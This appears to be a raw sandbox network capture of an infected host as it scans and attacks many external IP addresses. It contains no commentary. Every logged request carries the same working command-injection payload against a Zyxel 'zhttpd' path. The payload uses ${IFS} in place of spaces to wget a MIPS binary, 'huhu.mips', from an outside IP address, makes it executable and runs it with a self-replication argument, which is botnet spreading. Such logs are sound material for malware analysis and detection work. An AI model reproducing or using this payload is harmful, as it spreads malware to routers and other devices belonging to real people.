                                              Jan 29, 2024 07:03:59.189160109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6599192.168.2.143949859.146.30.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189203024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6600192.168.2.1449662117.17.181.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189237118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6601192.168.2.1435718114.246.242.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189282894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6602192.168.2.143729679.213.135.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189313889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6603192.168.2.1443330150.10.163.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189341068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6604192.168.2.1437380213.69.56.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189377069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6605192.168.2.1453868176.38.113.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189414978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6606192.168.2.1437622213.229.26.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189465046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6607192.168.2.146006666.191.248.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189506054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6608192.168.2.145061699.227.111.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189534903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6609192.168.2.1460012196.145.230.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189563990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6610192.168.2.1434044219.191.189.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189594984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6611192.168.2.1458172137.174.233.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189635992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6612192.168.2.145761441.60.177.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189681053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6613192.168.2.144900296.8.60.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189735889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6614192.168.2.145173035.14.90.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189759970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6615192.168.2.1446644112.55.103.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189810038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6616192.168.2.1449224116.2.93.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189836979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6617192.168.2.143942241.43.34.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189868927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6618192.168.2.143631036.218.181.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189903021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6619192.168.2.145272644.187.203.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189941883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6620192.168.2.1437052221.127.16.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.189966917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6621192.168.2.144773452.254.60.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190006018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6622192.168.2.144125843.149.148.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190037012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6623192.168.2.1440886105.60.12.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190066099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6624192.168.2.1450632206.254.55.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190114021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6625192.168.2.1450506205.36.207.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190155029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6626192.168.2.145640070.249.115.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190198898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6627192.168.2.145609859.155.126.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190218925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6628192.168.2.145683025.104.243.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190247059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6629192.168.2.1440042152.215.53.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190310955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6630192.168.2.143318641.5.210.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190363884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6631192.168.2.143455876.86.40.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190398932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6632192.168.2.1454514180.114.56.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190444946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6633192.168.2.144314814.74.122.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190494061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6634192.168.2.145768858.216.204.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190532923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6635192.168.2.145779219.11.147.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190586090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6636192.168.2.145265460.125.40.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190608978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6637192.168.2.1437362222.7.179.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190646887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6638192.168.2.1439458135.246.172.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190670013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6639192.168.2.1451524150.22.42.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190732956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6640192.168.2.144100842.194.245.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190766096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6641192.168.2.144800467.59.165.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190809011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6642192.168.2.1440348147.237.67.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190850019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6643192.168.2.1457078152.96.194.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190900087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6644192.168.2.1457532185.203.24.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190933943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6645192.168.2.1442732204.124.73.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.190977097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6646192.168.2.1446054139.112.186.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191020012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6647192.168.2.1450710163.137.200.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191039085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6648192.168.2.144400431.48.152.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191091061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6649192.168.2.1449862201.191.166.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191109896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6650192.168.2.144478279.64.90.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191169977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6651192.168.2.1445512223.231.39.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191206932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6652192.168.2.1444402161.135.144.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191246033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6653192.168.2.1433136124.157.154.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191277027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6654192.168.2.1443586115.154.148.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191338062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6655192.168.2.1444280195.213.187.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191374063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6656192.168.2.143881818.155.64.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191418886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6657192.168.2.143689836.88.67.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191467047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6658192.168.2.144159419.165.239.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191512108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6659192.168.2.146071050.185.1.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191549063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6660192.168.2.143592038.118.163.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191596031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6661192.168.2.1447606176.133.156.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191632032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6662192.168.2.1454438134.2.215.80443
                                              TimestampBytes transferredDirectionData
